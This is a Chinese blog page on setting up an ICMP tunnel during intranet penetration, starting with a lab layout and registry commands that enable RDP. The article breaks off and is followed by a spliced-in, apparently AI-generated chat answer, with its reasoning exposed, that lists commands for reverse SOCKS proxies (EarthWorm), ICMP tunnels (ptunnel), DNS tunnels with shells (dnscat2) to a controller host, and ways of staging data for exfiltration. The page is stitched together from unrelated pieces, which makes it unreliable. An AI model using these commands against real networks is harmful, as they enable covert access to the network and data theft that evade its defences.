内网渗透ICMP隧道搭建

内网渗透ICMP隧道搭建

192.168.0.x模拟外网机器,1.1.1.x模拟内网机器

Linux(1.1.1.111/192.168.0.138)为WEB服务器,模拟getshell了WEB服务器的情况,通过该被控制机器将内网Windows机器(1.1.1.99)的3389远程端口映射到外网VPS(192.168.0.130)的2320端口上,黑客机器通过RDP连接192.168.0.130:2320实现远控内网Windows机器,在内网机器存在ICMP协议出网情况下即能ping通外网机器,可以搭建ICMP隧道
在这里插入图片描述

环境检查

在搭建隧道前需要确认被攻击的内网机器可以被远程连接,以下是需要检查的一些操作

开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在这里插入图片描述

关闭3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f 
<think>好的,用户在进行内网渗透测试时遇到了无法出网的情况,需要解决方案。首先,我得回忆一下内网渗透的常见方法,尤其是没有外网连接的情况。通常,这种情况下需要利用内网中的现有资源进行横向移动和数据回传。 首先想到的是Socks代理,比如使用EarthWorm或reGeorg这些工具,通过建立代理通道,让内网的流量能够通过已经被控制的机器转发出去。但用户提到不出网,可能意味着目标机器无法直接连接外网,这时候可能需要利用内网中其他可出网的机器作为跳板,不过如果整个内网都不出网,可能需要其他方法。 接下来是ICMP协议,因为很多防火墙会允许ICMP流量通过。使用ICMP隧道工具如ptunnel或icmpsh,可以将数据封装在ICMP包中进行传输。这样即使TCP/UDP出网被限制,ICMP可能仍然可用。不过需要注意目标网络是否允许ICMP流量,有些严格的环境可能会限制。 DNS隧道也是一个选项,像dnscat2这样的工具可以利用DNS查询和响应来传输数据。因为DNS服务通常需要解析外部域名,所以即使其他协议被阻断,DNS流量可能仍然存在。但这种方法需要有一个可控的域名,并且配置DNS服务器,可能会比较复杂。 文件传输方面,如果无法直接外传数据,可以考虑将数据存储在内部服务器上,或者使用内部共享、邮件等方式。比如,把数据打包后上传到内部FTP服务器,或者通过内部邮件系统发送到控制的邮箱。不过这种方法需要找到可用的内部服务,并且有权限访问。 横向移动技术,比如Pass The Hash、利用PsExec或WMI执行命令,可以在内网中移动到其他机器,寻找可能存在出网通道的主机。如果找到一台能够出网的机器,就可以利用它作为跳板。比如,使用Mimikatz获取其他用户的凭证,然后通过PsExec连接到其他机器,再从那台机器向外传输数据。 还有可能需要搭建临时的内部代理或中继服务器。例如,如果有一台Web服务器可以对外访问,可以上传一个webshell,然后通过该webshell建立反向代理。或者利用内部的数据库服务器,通过SQL注入执行命令,进而建立通道。 另外,可能需要检查内网中的开放端口和服务,寻找未被防火墙限制的协议。比如,有些环境下可能允许SSH或者RDP的特定端口,可以利用这些服务进行隧道传输。使用工具如sshuttle或者Plink建立SSH隧道,将本地端口转发到外部服务器。 最后,如果所有方法都不可行,可能需要物理接触设备,或者利用社会工程学手段获取更多访问权限。不过这在渗透测试中可能超出授权范围,需要特别注意。 需要验证这些方法的可行性和对目标环境的影响,确保符合测试的授权范围。同时,考虑日志和监控,避免触发安全警报。可能还需要组合多种技术,逐步深入内网,寻找突破口。</think>### 内网渗透测试无外网连接解决方案 #### 1. 基于Socks代理的横向渗透 通过工具如 **EarthWorm** 或 **reGeorg** 建立内网代理链,利用已控制的机器作为跳板: ```bash # EarthWorm示例(反向代理模式) ./ew -s rcsocks -l 1080 -e 8888 ``` 在目标机器执行反向连接: ```bash ./ew -s rssocks -d <控制端IP> -e 8888 ``` 此时可通过本地1080端口访问目标内网资源[^1]。 #### 2. ICMP协议隧道传输 当TCP/UDP出网被阻断时,使用 **ICMP隧道** 工具: - **ptunnel**:封装TCP流量到ICMP包 ```bash # 控制端 ptunnel -x password # 目标端 ptunnel -p <控制端IP> -lp 1080 -da target_ip -dp 22 -x password ``` 通过`ssh -p 1080 user@localhost`即可访问目标SSH服务[^2]。 #### 3. DNS隐蔽信道 使用 **dnscat2** 构建DNS隧道: ```bash # 控制端 dnscat2-server --secret=password # 目标端 dnscat2 --dns server=<域名>,port=53 --secret=password ``` 支持文件传输、交互式Shell等功能,依赖域名解析权限[^3]。 #### 4. 非协议级文件外传 若协议层完全封闭,可采用: - **内部服务暂存**:将数据上传至内部FTP/Web服务器 - **物理介质模拟**:通过打印机队列、共享目录流转 - **内存驻留技术**:使用 **PowerShell** 脚本加密暂存数据 ```powershell $data = Get-Content sensitive.txt -Raw $encrypted = ConvertTo-SecureString $data -AsPlainText -Force $encrypted | ConvertFrom-SecureString | Set-Content temp.dat ``` #### 5. 协议复用技巧 针对特殊场景的流量伪装: - **HTTP头注入**:在正常Web请求中夹带数据 - **RDP虚拟通道**:通过远程桌面协议传输文件 - **SCSI命令注入**:利用存储协议的特殊指令
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值